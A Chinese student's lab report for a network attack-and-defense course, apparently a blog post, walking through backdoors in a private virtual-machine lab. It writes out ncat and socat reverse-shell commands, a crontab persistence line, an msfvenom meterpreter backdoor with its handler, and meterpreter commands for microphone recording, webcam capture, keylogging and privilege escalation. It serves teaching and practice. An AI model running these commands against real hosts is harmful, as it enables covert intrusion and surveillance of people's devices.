2018-2019-2 網絡對抗技術 20165231 Exp2 後門原理與實踐

<div v class="preview html_preview xsj_public"><div class="xiaoshujiang_element xsj_anchor"> <a name="e5ae9ee9aa8ce58685e5aeb9_1" class="blank_anchor_name" target="_blank"></a><a id="e5ae9ee9aa8ce58685e5aeb9_1" class="blank_anchor_id" target="_blank"></a><a name="實驗內容" class="blank_anchor_name" target="_blank"></a><a id="實驗內容" class="blank_anchor_id" target="_blank"></a> </div> <h2 class="xsj_heading_hash xsj_heading xsj_heading_h2"><span class="xsj_heading_content">實驗內容</span></h2> <p class="xsj_paragraph xsj_paragraph_level_0">1.使用netcat獲取主機操做Shell,cron啓動<br> 2.使用socat獲取主機操做Shell, 任務計劃啓動<br> 3.使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell<br> 4.使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權<br> 5.使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈鏈接Shell</p> <div class="xiaoshujiang_element xsj_anchor"> <a name="e59fbae7a180e997aee7ad94_2" class="blank_anchor_name" target="_blank"></a><a id="e59fbae7a180e997aee7ad94_2" class="blank_anchor_id" target="_blank"></a><a name="基礎問答" class="blank_anchor_name" target="_blank"></a><a id="基礎問答" class="blank_anchor_id" target="_blank"></a> </div> <h2 class="xsj_heading_hash xsj_heading xsj_heading_h2"><span class="xsj_heading_content">基礎問答</span></h2> <p class="xsj_paragraph xsj_paragraph_level_0">(1)例舉你能想到的一個後門進入到你係統中的可能方式?</p> <ul> <li>網站捆綁下載</li> </ul> <p class="xsj_paragraph xsj_paragraph_level_0">(2)例舉你知道的後門如何啓動起來(win及linux)的方式?</p> <ul> <li>修改註冊表,添加自啓動、修改正常軟件快捷方式的啓動路徑</li> </ul> <p class="xsj_paragraph xsj_paragraph_level_0">(3)Meterpreter有哪些給你映像深入的功能?</p> <ul> <li>奪取開啓攝像頭、麥克風等設備權限,讀取鍵盤內容</li> </ul> <p class="xsj_paragraph xsj_paragraph_level_0">(4)如何發現本身有系統有沒有被安裝後門?</p> <ul> <li>電腦安全軟件掃描、查看自啓項有無異常程序</li> </ul> <div class="xiaoshujiang_element xsj_anchor"> <a name="e5ae9ee9aa8ce8bf87e7a88b_3" class="blank_anchor_name" target="_blank"></a><a id="e5ae9ee9aa8ce8bf87e7a88b_3" class="blank_anchor_id" target="_blank"></a><a name="實驗過程" class="blank_anchor_name" target="_blank"></a><a id="實驗過程" class="blank_anchor_id" target="_blank"></a> </div> <h2 class="xsj_heading_hash xsj_heading xsj_heading_h2"><span class="xsj_heading_content">實驗過程</span></h2> <div class="xiaoshujiang_element xsj_anchor"> <a name="e5b8b8e794a8e5908ee997a8e5b7a5e585b7e6b58be8af95_4" class="blank_anchor_name" target="_blank"></a><a id="e5b8b8e794a8e5908ee997a8e5b7a5e585b7e6b58be8af95_4" class="blank_anchor_id" target="_blank"></a><a name="經常使用後門工具測試" class="blank_anchor_name" target="_blank"></a><a id="經常使用後門工具測試" class="blank_anchor_id" target="_blank"></a> </div> <h3 class="xsj_heading_hash xsj_heading xsj_heading_h3"><span class="xsj_heading_content">經常使用後門工具測試</span></h3> <div class="xiaoshujiang_element xsj_anchor"> <a name="ncat_5" class="blank_anchor_name" target="_blank"></a><a id="ncat_5" class="blank_anchor_id" target="_blank"></a><a name="ncat" class="blank_anchor_name" target="_blank"></a><a id="ncat" class="blank_anchor_id" target="_blank"></a> </div> <h4 class="xsj_heading_hash xsj_heading xsj_heading_h4"><span class="xsj_heading_content">ncat</span></h4> <div class="xiaoshujiang_element xsj_anchor"> <a name="linuxe88eb7e5be97windows20shell_6" class="blank_anchor_name" target="_blank"></a><a id="linuxe88eb7e5be97windows20shell_6" class="blank_anchor_id" target="_blank"></a><a name="linux得到windows-shell" class="blank_anchor_name" target="_blank"></a><a id="linux得到windows-shell" class="blank_anchor_id" target="_blank"></a> </div> <h5 class="xsj_heading_hash xsj_heading xsj_heading_h5"><span class="xsj_heading_content">Linux得到Windows Shell</span></h5> <ul> <li>首先在查看kali虛擬機的IP地址<code>ifconfig</code>(這裏和win的<code>ipconfig</code>有所區別)<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111052529-1483369243.png" alt=" " title=" " name="images/kali_ip.png" data-src="./images/kali_ip.png"></span></li> <li>kali使用nc指令監聽端口:<code>nc -l -p 5231</code></li> <li>Windows上使用ncat.exe程序的-e選項項反向鏈接Kali主機的端口:ncat.exe -e cmd.exe 192.168.70.131 5231</li> <li>kali:得到win7 Windows Shell<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111053548-203636824.png" alt=" " title=" " name="images/kali控win-1.png" data-src="./images/kali%E6%8E%A7win-1.png"></span></li> </ul> <div class="xiaoshujiang_element xsj_anchor"> <a name="windowse88eb7e5be97linux20shell_7" class="blank_anchor_name" target="_blank"></a><a id="windowse88eb7e5be97linux20shell_7" class="blank_anchor_id" target="_blank"></a><a name="windows得到linux-shell" class="blank_anchor_name" target="_blank"></a><a id="windows得到linux-shell" class="blank_anchor_id" target="_blank"></a> </div> <h5 class="xsj_heading_hash xsj_heading xsj_heading_h5"><span class="xsj_heading_content">Windows得到Linux Shell</span></h5> <ul> <li>Windows:使用ipconfig指令查看本機IP:192.168.70.130<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111054969-114833963.png" alt=" " title=" " name="images/win_ip.png" data-src="./images/win_ip.png"></span></li> <li>使用ncat.exe程序監聽本機的端口:<code>ncat.exe -l -p 5231</code></li> <li>kali:使用nc指令的-e選項反向鏈接Windows主機的端口:<code>ncat 192.168.70.130 5231 -e /bin/sh</code></li> <li>Windows獲取kali shell<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111055355-1330331357.png" alt=" " title=" " name="images/win控kali-1.png" data-src="./images/win%E6%8E%A7kali-1.png"></span></li> </ul> <div class="xiaoshujiang_element xsj_anchor"> <a name="e794a8nce4bca0e8be93e695b0e68dae_8" class="blank_anchor_name" target="_blank"></a><a id="e794a8nce4bca0e8be93e695b0e68dae_8" class="blank_anchor_id" target="_blank"></a><a name="用nc傳輸數據" class="blank_anchor_name" target="_blank"></a><a id="用nc傳輸數據" class="blank_anchor_id" target="_blank"></a> </div> <h5 class="xsj_heading_hash xsj_heading xsj_heading_h5"><span class="xsj_heading_content">用nc傳輸數據</span></h5> <ul> <li>在Windows下監聽端口:<code>ncat.exe -l 5231</code></li> <li>kali下鏈接到Windows的端口:<code>nc 192.168.70.130 5231</code><br> 以後就能夠雙向傳輸文字</li> </ul> <div class="xiaoshujiang_element xsj_anchor"> <a name="e794a8nce4bca0e8be93e69687e4bbb6_9" class="blank_anchor_name" target="_blank"></a><a id="e794a8nce4bca0e8be93e69687e4bbb6_9" class="blank_anchor_id" target="_blank"></a><a name="用nc傳輸文件" class="blank_anchor_name" target="_blank"></a><a id="用nc傳輸文件" class="blank_anchor_id" target="_blank"></a> </div> <h5 class="xsj_heading_hash xsj_heading xsj_heading_h5"><span class="xsj_heading_content">用nc傳輸文件</span></h5> <ul> <li>Windows下監聽端口,把收到的數據保存到wyhy.out中:<code>ncat.exe -l 5231 &gt; wyhy.out</code></li> <li>kali下先建立wyhy.in文件,再反彈鏈接到Windows的端口:<code>nc 192.168.70.130 5231 &lt; wyhy.in</code><br> 傳輸成功後kali裏建立的文件的內容就會在Windows同名文件中出現。<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111055583-1004352803.png" alt="" title="" name="images/傳文件kali_1.png" data-src="./images/%E4%BC%A0%E6%96%87%E4%BB%B6kali_1.png"></span><br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111056043-1201411368.png" alt=" " title=" " name="images/傳文件win_1.png" data-src="./images/%E4%BC%A0%E6%96%87%E4%BB%B6win_1.png"></span></li> </ul> <div class="xiaoshujiang_element xsj_anchor"> <a name="1e38081e4bdbfe794a8netcate88eb7e58f96e4b8bbe69cbae6938de4bd9cshellefbc8ccrone590afe58aa8_10" class="blank_anchor_name" target="_blank"></a><a id="1e38081e4bdbfe794a8netcate88eb7e58f96e4b8bbe69cbae6938de4bd9cshellefbc8ccrone590afe58aa8_10" class="blank_anchor_id" target="_blank"></a><a name="1-使用netcat獲取主機操做shellcron啓動" class="blank_anchor_name" target="_blank"></a><a id="1-使用netcat獲取主機操做shellcron啓動" class="blank_anchor_id" target="_blank"></a> </div> <h3 class="xsj_heading_hash xsj_heading xsj_heading_h3"><span class="xsj_heading_content">一、使用netcat獲取主機操做Shell,cron啓動</span></h3> <p class="xsj_paragraph xsj_paragraph_level_0">先在win7系統下,監聽端口:<code>ncat.exe -l -p 5231</code><br> 在kali下,使用<code>man cron</code>查看crontab命令的幫助文檔<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111056421-1799704177.png" alt=" " title=" " name="images/man_cron.png" data-src="./images/man_cron.png"></span><br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111057541-515069567.png" alt=" " title=" " name="images/翻譯.png" data-src="./images/%E7%BF%BB%E8%AF%91.png"></span></p> <ul> <li>crontab指令能夠用於設置週期性被執行的指令。該命令從標準輸入設備讀取指令,並將其存放於crontab文件中,以供以後讀取和執行。</li> </ul> <p class="xsj_paragraph xsj_paragraph_level_0">用<code>crontab -e</code>指令編輯一條定時任務<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111058357-158091209.png" alt=" " title=" " name="images/定時.png" data-src="./images/%E5%AE%9A%E6%97%B6.png"></span><br> 在最後一行添加<code>18 * * * * /bin/netcat 192.168.70.131 -e /bin/sh</code>,意思是在每一個小時的第18分鐘反向鏈接Windows主機的端口</p> <p class="xsj_paragraph xsj_paragraph_level_0">在時間沒到的時候不管你在Windows那邊怎麼輸都是沒有反應的,可是在時間到的一刻你輸入的全部都會瞬間顯示在頻幕上</p> <p class="xsj_paragraph xsj_paragraph_level_0"></p><div class="story_image_container story_block_image"><div class="story_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111058888-605079851.png" alt=" " title=" " name="images/1結果.png" data-src="./images/1%E7%BB%93%E6%9E%9C.png"><br><div class="story_image_caption story_image_blank_caption"> </div></div></div><p></p> <div class="xiaoshujiang_element xsj_anchor"> <a name="2e38081e4bdbfe794a8socate88eb7e58f96e4b8bbe69cbae6938de4bd9cshell20e4bbbbe58aa1e8aea1e58892e590afe58aa8_11" class="blank_anchor_name" target="_blank"></a><a id="2e38081e4bdbfe794a8socate88eb7e58f96e4b8bbe69cbae6938de4bd9cshell20e4bbbbe58aa1e8aea1e58892e590afe58aa8_11" class="blank_anchor_id" target="_blank"></a><a name="2-使用socat獲取主機操做shell-任務計劃啓動" class="blank_anchor_name" target="_blank"></a><a id="2-使用socat獲取主機操做shell-任務計劃啓動" class="blank_anchor_id" target="_blank"></a> </div> <h3 class="xsj_heading_hash xsj_heading xsj_heading_h3"><span class="xsj_heading_content">二、使用socat獲取主機操做Shell, 任務計劃啓動</span></h3> <ul> <li>在Windows系統下,打開<code>控制面板&gt;系統和安全&gt;管理工具&gt;任務計劃程序&gt;建立任務</code>在觸發器選項開始任務選項選擇<code>工做站鎖定時</code><br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111100099-568237632.png" alt=" " title=" " name="images/建立觸發器.png" data-src="./images/%E5%88%9B%E5%BB%BA%E8%A7%A6%E5%8F%91%E5%99%A8.png"></span><br> 在操做選項卡填入socat的路徑,參數填<code>tcp-listen:XX exec:cmd.exe,pty,stderr</code>(XX爲本身設定端口號)</li> </ul> <p class="xsj_paragraph xsj_paragraph_level_0"></p><div class="story_image_container story_block_image"><div class="story_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111101537-1372935084.png" alt=" " title=" " name="images/建立操做.png" data-src="./images/%E5%88%9B%E5%BB%BA%E6%93%8D%E4%BD%9C.png"><br><div class="story_image_caption story_image_blank_caption"> </div></div></div><p></p> <p class="xsj_paragraph xsj_paragraph_level_0">建立完成後鎖定Windows,而後去kali<br> 在kali輸入<code>socat - tcp:windows IP:端口號</code>此時能夠發現已經成功得到了一個cmd shell(這裏可能須要作兩次,Windows初次使用socat會有彈窗提示是否容許使用網絡,然而你鎖了Windows啥都不知道,不成功就倒回去Windows看看吧)<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111102224-791503318.png" alt=" " title=" " name="images/實驗二結果.png" data-src="./images/%E5%AE%9E%E9%AA%8C%E4%BA%8C%E7%BB%93%E6%9E%9C.png"></span></p> <div class="xiaoshujiang_element xsj_anchor"> <a name="3e38081e4bdbfe794a8msf20meterpretere7949fe68890e58fafe689a7e8a18ce69687e4bbb6efbc8ce588a9e794a8ncate68896socate4bca0e98081e588b0e4b8bbe69cbae5b9b6e8bf90e8a18ce88eb7e58f96e4b8bbe69cbashell_12" class="blank_anchor_name" target="_blank"></a><a id="3e38081e4bdbfe794a8msf20meterpretere7949fe68890e58fafe689a7e8a18ce69687e4bbb6efbc8ce588a9e794a8ncate68896socate4bca0e98081e588b0e4b8bbe69cbae5b9b6e8bf90e8a18ce88eb7e58f96e4b8bbe69cbashell_12" class="blank_anchor_id" target="_blank"></a><a name="3-使用msf-meterpreter生成可執行文件利用ncat或socat傳送到主機並運行獲取主機shell" class="blank_anchor_name" target="_blank"></a><a id="3-使用msf-meterpreter生成可執行文件利用ncat或socat傳送到主機並運行獲取主機shell" class="blank_anchor_id" target="_blank"></a> </div> <h3 class="xsj_heading_hash xsj_heading xsj_heading_h3"><span class="xsj_heading_content">三、使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell</span></h3> <p class="xsj_paragraph xsj_paragraph_level_0">在kali中輸入指令<code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali IP LPORT=XXXX -f exe &gt; 20165231_backdoor.exe</code>生成後門<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111104494-1093181105.png" alt=" " title=" " name="images/生成後門.png" data-src="./images/%E7%94%9F%E6%88%90%E5%90%8E%E9%97%A8.png"></span></p> <p class="xsj_paragraph xsj_paragraph_level_0">在Windows下執行<code>ncat.exe -l 5231 &gt; 20165231_backdoor.exe</code>,被控主機進入接收文件模式<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111105470-703264936.png" alt=" " title=" " name="images/生成後門_1.png" data-src="./images/%E7%94%9F%E6%88%90%E5%90%8E%E9%97%A8_1.png"></span><br> 在kali中經過<code>nc windows ip:XXXX &lt; 20165230_backdoor.exe</code>將生成的後門程序傳送到Windows主機上<br> 在kali上使用<code>msfconsole</code>指令進入msf控制檯<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111106286-1703040726.png" alt=" " title=" " name="images/監控平臺.png" data-src="./images/%E7%9B%91%E6%8E%A7%E5%B9%B3%E5%8F%B0.png"></span></p> <p class="xsj_paragraph xsj_paragraph_level_0">設置監聽模塊</p> <blockquote> <p class="xsj_paragraph xsj_paragraph_level_1">use exploit/multi/handler //使用監聽模塊,設置payload<br> set payload windows/meterpreter/reverse_tcp //使用和生成後門程序時相同的payload<br> set LHOST 192.168.70.131 //這裏用的是LinuxIP,和生成後門程序時指定的IP相同<br> set LPORT 5231 //一樣要使用相同的端口</p> </blockquote> <p class="xsj_paragraph xsj_paragraph_level_0"></p><div class="story_image_container story_block_image"><div class="story_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111107490-1991133014.png" alt=" " title=" " name="images/監聽配置.png" data-src="./images/%E7%9B%91%E5%90%AC%E9%85%8D%E7%BD%AE.png"><br><div class="story_image_caption story_image_blank_caption"> </div></div></div><p></p> <p class="xsj_paragraph xsj_paragraph_level_0">設置完成後,執行監聽<code>exploit</code>而後在Windows上雙擊以前生成的文件<br> 此時kali上已經得到了Windows主機的鏈接,而且獲得了遠程控制的shell<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111108548-172311526.png" alt=" " title=" " name="images/監聽成功.png" data-src="./images/%E7%9B%91%E5%90%AC%E6%88%90%E5%8A%9F.png"></span></p> <div class="xiaoshujiang_element xsj_anchor"> <a name="4e38081e4bdbfe794a8msf20meterpretere7949fe68890e88eb7e58f96e79baee6a087e4b8bbe69cbae99fb3e9a291e38081e69184e5838fe5a4b4e38081e587bbe994aee8aeb0e5bd95e7ad89e58685e5aeb9efbc8ce5b9b6e5b09de8af95e68f90e69d83_13" class="blank_anchor_name" target="_blank"></a><a id="4e38081e4bdbfe794a8msf20meterpretere7949fe68890e88eb7e58f96e79baee6a087e4b8bbe69cbae99fb3e9a291e38081e69184e5838fe5a4b4e38081e587bbe994aee8aeb0e5bd95e7ad89e58685e5aeb9efbc8ce5b9b6e5b09de8af95e68f90e69d83_13" class="blank_anchor_id" target="_blank"></a><a name="4-使用msf-meterpreter生成獲取目標主機音頻-攝像頭-擊鍵記錄等內容並嘗試提權" class="blank_anchor_name" target="_blank"></a><a id="4-使用msf-meterpreter生成獲取目標主機音頻-攝像頭-擊鍵記錄等內容並嘗試提權" class="blank_anchor_id" target="_blank"></a> </div> <h3 class="xsj_heading_hash xsj_heading xsj_heading_h3"><span class="xsj_heading_content">四、使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權</span></h3> <p class="xsj_paragraph xsj_paragraph_level_0">使用<code>record_mic</code>指令截獲一段音頻<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111109137-1112246340.png" alt=" " title=" " name="images/luyin.png" data-src="./images/luyin.png"></span><br> 使用<code>webcam_snap</code>指令可使用攝像頭進行拍照:<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111110859-1323319754.png" alt=" " title=" " name="images/拍照.png" data-src="./images/%E6%8B%8D%E7%85%A7.png"></span><br> 使用<code>webcam stream</code>指令可使用攝像頭進行錄像:<br> 使用<code>screenshot</code>指令能夠進行截屏:</p> <p class="xsj_paragraph xsj_paragraph_level_0">使用<code>keyscan_start</code>指令開始,在windows中記錄下擊鍵的過程,使用<code>keyscan_dump</code>指令讀取擊鍵的記錄:</p> <p class="xsj_paragraph xsj_paragraph_level_0">先使用<code>getuid</code>指令查看當前用戶,使用<code>getsystem</code>指令進行提權,如圖所示,提權成功<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111112328-2135864890.png" alt=" " title=" " name="images/監控.png" data-src="./images/%E7%9B%91%E6%8E%A7.png"></span></p> <div class="xiaoshujiang_element xsj_anchor"> <a name="e5ae9ee9aa8ce98187e588b0e79a84e997aee9a298_14" class="blank_anchor_name" target="_blank"></a><a id="e5ae9ee9aa8ce98187e588b0e79a84e997aee9a298_14" class="blank_anchor_id" target="_blank"></a><a name="實驗遇到的問題" class="blank_anchor_name" target="_blank"></a><a id="實驗遇到的問題" class="blank_anchor_id" target="_blank"></a> </div> <h2 class="xsj_heading_hash xsj_heading xsj_heading_h2"><span class="xsj_heading_content">實驗遇到的問題</span></h2> <p class="xsj_paragraph xsj_paragraph_level_0">一、使用MSF meterpreter調用攝像頭時顯示操做失敗:1411<br> 解決:虛擬機關聯到物理機的攝像頭,在VM虛擬機右下加有個U盤標誌,右鍵鏈接就關聯上物理機上的設備了。若是右下角沒有U盤標誌,那就在虛擬機設置裏面添加就ok了。<br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111112793-2134769297.png" alt=" " title=" " name="images/TIM截圖20190322235442.png" data-src="./images/TIM%E6%88%AA%E5%9B%BE20190322235442.png"></span><br> <span class="story_inline_image"><img src="https://img2018.cnblogs.com/blog/1043313/201903/1043313-20190323111113225-1869525041.png" alt=" " title=" " name="images/usb.png" data-src="./images/usb.png"></span></p> <div class="xiaoshujiang_element xsj_anchor"> <a name="e5ae9ee9aa8ce6849fe683b3_15" class="blank_anchor_name" target="_blank"></a><a id="e5ae9ee9aa8ce6849fe683b3_15" class="blank_anchor_id" target="_blank"></a><a name="實驗感想" class="blank_anchor_name" target="_blank"></a><a id="實驗感想" class="blank_anchor_id" target="_blank"></a> </div> <h2 class="xsj_heading_hash xsj_heading xsj_heading_h2"><span class="xsj_heading_content">實驗感想</span></h2> <p class="xsj_paragraph xsj_paragraph_level_0">我之前一直覺得只要防火牆,安全軟件安好就必定不會有什麼被入侵的可能。看來我仍是太年輕了,咱們這種初學的小米渣在win7沒關防火牆狀況下都能依葫蘆畫瓢完成滲透,若不是攝像頭啓動有指示燈,神不知鬼不覺都被拍了。不過對於目前的渣渣技術想要徹底滲透到別人的系統裏除了這些技術看來還得用上社會工程學才能得手啊。</p> </div>html

相關文章
相關標籤/搜索